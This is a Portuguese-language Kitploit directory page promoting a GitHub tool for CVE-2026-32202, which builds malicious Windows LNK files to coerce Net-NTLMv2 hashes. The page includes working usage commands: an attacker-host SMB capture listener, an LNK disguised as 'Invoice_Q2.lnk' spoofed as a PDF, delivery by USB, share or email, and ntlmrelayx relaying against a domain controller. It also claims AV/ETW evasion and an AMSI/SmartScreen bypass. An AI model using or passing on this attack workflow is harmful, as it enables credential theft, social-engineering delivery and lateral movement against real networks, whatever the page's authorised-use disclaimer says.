Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-32202 — Gera arquivos LNK maliciosos para coagir hashes Net-NTLMv2 por meio do tratamento UNC do Windows Shell, com listener SMB personalizado e integração de relay para operações autorizadas de red team. | Kitploit
Ferramentas/GitHubGitHub/solarlynxsqueeze/cve-2026-32202
Geração de PayloadsExploraçãoMovimento LateralTestes de PenetraçãoRed Teaming
GitHubsolarlynxsqueeze/cve-2026-32202

CVE-2026-32202

Gera arquivos LNK maliciosos para coagir hashes Net-NTLMv2 por meio do tratamento UNC do Windows Shell, com listener SMB personalizado e integração de relay para operações autorizadas de red team.

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
há 3 mesesAinda não revisado
Compartilhar

Aviso Legal

Esta ferramenta destina-se exclusivamente a red teaming autorizado e testes de penetração.
O uso não autorizado contra sistemas sem permissão explícita é ilegal.
Use por sua conta e risco. O autor não assume qualquer responsabilidade por uso indevido ou danos.

Descrição
Coerção de hash NTLMv2 via bypass incompleto da proteção do Windows Shell (CVE-2026-32202). Gera arquivos LNK especialmente elaborados que forçam autenticação SMB/UNC ao abrir ou visualizar no Explorer. Baixa interação, funciona em sistemas corrigidos onde a correção de abril de 2026 foi insuficiente. Usado ativamente em engajamentos.

Principais Recursos

  • Vazamento Net-NTLMv2 zero-clique / interação mínima via LNK malicioso (caminho de visualização do Explorer + resolução de ícone).
  • Listener SMB personalizado para captura de hashes (sem necessidade de Responder, logs mais limpos).
  • Variante estável com footprint reduzido de ETW/Defender.
  • Modo de bypass parcial de AMSI/SmartScreen.
  • Pronto para cadeias de relay ntlmrelayx (SMB, LDAP, HTTP, etc.).

O que o exploit faz
A ferramenta cria um .LNK elaborado que abusa do tratamento do Shell de caminhos UNC em Target + IconEnvironmentDataBlock / estruturas ExtraData. Quando a vítima navega pela pasta ou passa o mouse/visualiza o arquivo, o Windows Shell inicia uma conexão SMB para o UNC controlado pelo atacante, vazando o hash Net-NTLMv2 da máquina/usuário. Sem execução de código no alvo - coerção de credenciais para relay ou cracking.

Por que é útil

  • Acesso inicial rápido em pentests internos / operações de red team (especialmente em ambientes air-gapped ou endurecidos onde phishing é restrito).
  • Perfeito para relay NTLM para alvos de alto valor (DCs, servidores de arquivos, Exchange, ADCS, etc.).
  • Funciona onde o Responder clássico é bloqueado ou ruidoso.
  • Alta taxa de sucesso em Win10 21H2–22H2, Win11 23H2–26H1, Server 2019–2025 (builds testados abaixo).

Testado em

  • Windows 11 24H2 (build 26100.XXXX)
  • Windows 11 23H2 / 25H2
  • Windows 10 22H2
  • Windows Server 2022 / 2025 (core + desktop experience)
  • Parcialmente eficaz após atualização cumulativa de abril de 2026 (correção incompleta confirmada em campo).
  • Dependências Instalar: pip install -r requirements.txt

    Uso

    root@kitploit:~
    # 1. Iniciar servidor de captura (host do atacante)
    python smbcapture.py -i 0.0.0.0 -p 445 --output hashes.txt
    
    # 2. Gerar LNK malicioso
    python coercegen.py --unc \\attacker-ip\share\test --output "Invoice_Q2.lnk" --spoof "invoice.pdf"
    
    # Opcional: modo estável ou bypass
    python coercestable.py --unc \\attacker-ip\share\test --output "Report.lnk"
    
    # 3. Entregar LNK (USB, compartilhamento, anexo de e-mail, OneDrive, etc.)
    
    # 4. Aguardar hash no terminal + arquivo. Exemplo de relay:
    ntlmrelayx.py -t smb://target-dc -c whoami --no-wmipriv
    # ou relay LDAP para RBCD, HTTP para cert ADCS, etc.
    

    Exploit

    href

    Limitações

    • Requer que a vítima interaja com a pasta contendo o arquivo (visualização do Explorer/passar o mouse geralmente é suficiente).
    • Segmentação de rede moderna + assinatura SMB + restrições NTLM reduzem o sucesso do relay.
    • Não é RCE completo - apenas material de credenciais.
    • O status do patch importa; sistemas totalmente atualizados em abril de 2026+ podem exigir a variante de bypass.

    Causa raiz (resumo)
    Correção incompleta na sanitização de caminhos UNC do Windows Shell e no processamento de blocos ExtraData para resolução de ícone/alvo de LNK. O mecanismo de proteção destinado a bloquear spoofing de rede não autenticado ainda dispara autenticação NTLM durante a enumeração do namespace do Shell.

    Baixar ferramenta